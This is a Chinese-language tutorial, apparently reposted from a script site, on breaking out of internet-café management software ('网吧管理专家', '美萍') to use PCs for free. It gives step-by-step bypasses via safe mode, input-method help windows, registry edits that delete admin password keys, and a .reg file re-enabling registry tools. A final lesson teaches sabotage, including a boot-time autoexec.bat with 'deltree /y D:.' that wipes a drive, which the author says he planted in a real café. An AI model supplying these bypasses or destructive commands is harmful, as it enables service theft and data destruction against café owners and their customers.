菜鳥的網(wǎng)吧常見(jiàn)漏洞入侵
發(fā)布日期:2021-12-28 20:13 | 文章來(lái)源:腳本之家
第一課 首先試試“安全模式”漏洞。
到網(wǎng)吧后開機(jī)(不要管理員解鎖),一會(huì)兒屏幕出現(xiàn)“Starting Windows ……”時(shí),按下"F5"鍵啟動(dòng)到“安全模式”,在“開始”→“運(yùn)行”框中輸入“msconfig”(回車),打開“系統(tǒng)配置實(shí)用程序”,用鼠標(biāo)單擊“啟動(dòng)”標(biāo)簽,去掉所有與網(wǎng)管軟件有關(guān)的項(xiàng),也可以在運(yùn)行框中輸入“regedit”打開注冊(cè)表,刪除注冊(cè)表“HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下的相關(guān)鍵值,更殘忍的干脆把網(wǎng)管軟件給卸載掉,重新啟動(dòng)計(jì)算機(jī)后,就可以免費(fèi)上網(wǎng)了。是不是很簡(jiǎn)單?不過(guò)可要當(dāng)心網(wǎng)吧老板!如果“F5”鍵被屏蔽了,則應(yīng)該先修改“msdos.sys”??纯聪旅娴?ldquo;輸入法”漏洞,大家就知道怎么修改了。
第二課(本課以“網(wǎng)吧管理專家”為例)
照樣先開機(jī)(啟動(dòng)過(guò)程別按“F5”),沒(méi)有讓管理員解鎖的計(jì)算機(jī)在桌面上有一密碼框,是用于驗(yàn)證用戶身份的。這里分為會(huì)員和管理員,兩種身份分別具有不同的使用權(quán)限。我不是管理員,所以我不知道管理員密碼,在座有哪位知道的?(你不用拼命搖頭啦!)沒(méi)有密碼照樣能進(jìn)入!我們可以繞到密碼框后面去。用鼠標(biāo)單擊“會(huì)員卡號(hào)”框,利用“ctrl shift”或“Ctrl Space(空格鍵)”調(diào)出輸入法,然后隨意輸入一個(gè)字母,在彈出的輸入框上單擊鼠標(biāo)右鍵,看看有沒(méi)有“幫助”。沒(méi)有的話就用“Ctrl Shift”切換輸入法,直到找出“幫助”后單擊它。鼠標(biāo)的移動(dòng)范圍被限制了,可以這樣破解它:按下“Alt Space”,在彈出的標(biāo)題欄菜單上(用鍵盤)選擇“移動(dòng)”,再回車兩下就OK了?;A(chǔ)打好了,現(xiàn)在讓我們看看這個(gè)網(wǎng)吧里有什么好東東,用鼠標(biāo)單擊“幫助”的標(biāo)題欄圖標(biāo)(有一種幫助沒(méi)有這個(gè)圖標(biāo),這種幫助好像沒(méi)什么利用價(jià)值)。打開控制菜單后,再單擊“跳至 URL(J) ...”,在彈出的輸入框中輸入網(wǎng)址或盤符都可以,先去C盤看看,輸入“C:”或“file:///C:/”。我找…… 似乎沒(méi)什么好玩的。你看那網(wǎng)管軟件,就放在這么顯眼的地方,也不怕被人執(zhí)行“Uninstall.exe”。…… 下面就開始上網(wǎng)了。:)去“新浪”逛逛,打開“跳至 URL(J)...”框,輸入“www.sina.com.cn”(“回車”),大家讓一讓,發(fā)生什么事了?網(wǎng)頁(yè)內(nèi)容竟然在“幫助”里顯示出來(lái)了!如果要去雅虎網(wǎng)站,還得再單擊“跳至 URL(J) ...”,麻煩了點(diǎn),不如去桌面上找個(gè)IE更方便些,這次還是得單擊“跳至 URL(J)...”,輸入“c:windowsdesktop”(回車),或者在剛才打開的c盤上任意選擇一個(gè)文件夾,按“shift Enter(回車)”,調(diào)出資源管理器,也可以到達(dá)桌面。
有些人想要管理員密碼,你可以自已來(lái)設(shè)置一個(gè),我慣用的方法是:打開注冊(cè)表,刪除“[Hkey_Local_MachineSoftware萬(wàn)象幻境專家系列管理軟件]”下的鍵名“計(jì)算機(jī)解鎖密碼”和“運(yùn)行設(shè)置程序密碼”的鍵值(另外還有其他的密碼,均已被編譯,要?jiǎng)h除就隨你便啦!)改完后退出注冊(cè)表并重新啟動(dòng)計(jì)算機(jī),密碼框不見(jiàn)了,然后依次單擊“開始→設(shè)置→運(yùn)行設(shè)置程序”,倘若你覺(jué)得該網(wǎng)吧限制太高,不妨把它設(shè)置低一點(diǎn)。如果注冊(cè)表編輯器被禁止,就當(dāng)我上面的話沒(méi)說(shuō),我們可以用這種方法破解:
1.在IE地址欄內(nèi)輸入“c:”,回車。
2.單擊“文件”菜單,新建一份文本文檔,輸入如下代碼:
以下是代碼片段:
Regedit4
[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:01000000
將文件另存為“1.reg”,把它雙擊安裝后就可以使用注冊(cè)表編輯器了。剛才提到怎樣解除“F5”的限制,利用“幫助”漏洞來(lái)解除可以,但是我想利用“快速提示”漏洞。
第三課 “輸入法”中的“快速提示”漏洞
這節(jié)課教大家什么?嗯!是“輸入法”中的“快速提示”漏洞,目前僅有“五筆加加”輸入法有這個(gè)漏洞。照上節(jié)課教的,不過(guò)這次要大家找的是“快速提示”,而不是“幫助”,切換輸入法,找到“快速提示”后單擊它,這時(shí)出現(xiàn)一個(gè)IE窗口(不是太菜的你應(yīng)該知道干什么用的,上網(wǎng)用的唄?。髽?biāo)移動(dòng)范圍被限制了,破解它(上節(jié)課教過(guò)了,但是如果IE窗口是最大化的,則應(yīng)該先在控制菜單中選擇“恢復(fù)為小窗口”后再“移動(dòng)”,再按“回車”),這樣便可免費(fèi)上網(wǎng)了,需要打開桌面,最簡(jiǎn)單的方法是:在IE地址欄上輸入“桌面”(回車)。回顧一下第一節(jié)課主要說(shuō)了什么……嗯!利用“F5”漏洞免費(fèi)上網(wǎng),大多被屏蔽掉了,第二節(jié)課說(shuō)過(guò)要利用“快速提示”漏洞來(lái)解除它。怎么做呢?(大家筆拿起來(lái)做些筆記),“msdos.sys”文件在C盤根目錄下一般是以“隱藏”和“只讀”形式儲(chǔ)存的,我們需要先去掉它的“只讀”屬性,要不然無(wú)法對(duì)它做任何修改,在IE地址欄上輸入“file:///C:/command.com”回車,打開“ms-dos方式”,在提示符下輸入 “attrib -r c:msdos.sys”(回車)以去掉“只讀”屬性,再返回到IE地址欄上輸入“file:///C:/msdos.sys”(回車),把“打開方式”設(shè)為“記事本”,把“option”下的“BootKeys”的值改為“1”,保存退出。重新啟動(dòng)計(jì)算機(jī)便可使修改生效。
上面講的都是以“網(wǎng)吧管理專家”網(wǎng)管軟件為例,如果是“美萍”控制的計(jì)算機(jī),得先打開“開始→會(huì)員登陸”,接下來(lái)與“網(wǎng)吧管理專家”操作過(guò)程相同。再補(bǔ)充一點(diǎn),其實(shí)免費(fèi)上網(wǎng)還有一種方法,不過(guò)成功率不高,就是使網(wǎng)管軟件出錯(cuò),我是用鍵盤上的“Ctrl、Shift、Alt”三個(gè)鍵中任一鍵或任兩鍵配合其他鍵狂按,結(jié)果網(wǎng)管軟件報(bào)錯(cuò)退出,“我的電腦”和“回收站”等都出現(xiàn)在桌面上了。
第四課 一些破壞網(wǎng)吧數(shù)據(jù)的方法(那位耳朵伸得那么長(zhǎng),想必是網(wǎng)德不善者)。
破壞1(破壞級(jí)別:中):
在IE“地址欄”或“jump to URL”中輸入“file:///c:/windows/control.exe”,打開“控制面板→ 添加/刪除程序”,卸載掉你“感興趣”的應(yīng)用程序。
破壞2(破壞級(jí)別:中→高):
為了防止文件被刪除,網(wǎng)管軟件一般都屏蔽了鼠標(biāo)右鍵,并且連鍵盤上的“Delete”和“Shift Delete”也無(wú)效,不過(guò)據(jù)我所知,在“網(wǎng)吧管理專家”控制下的數(shù)據(jù)可以用“Ctrl D”來(lái)刪除。 so.bitsCN.com網(wǎng)管資料庫(kù)任你搜
破壞3(破壞級(jí)別:高):
修改C盤根目錄下的“autoexec.bat”文件為如下代碼:
以下是代碼片段:
@echo off
path=c:windows;c:windowscommand
smartdrv >nul
deltree /y D:. >nul
這些代碼是我前段時(shí)間在某網(wǎng)吧里預(yù)留的,后果只是使硬盤D分區(qū)的數(shù)據(jù)全部丟失而已,但計(jì)算機(jī)仍可啟動(dòng)(因?yàn)椴僮飨到y(tǒng)被裝在C盤),若將第四段代碼的“D:”改為“C:”,有什么后果?你試試就知道了,像我這樣心地善良,樂(lè)于助人的人,是不會(huì)那么做的。
版權(quán)聲明:本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái),僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。
相關(guān)文章
關(guān)注官方微信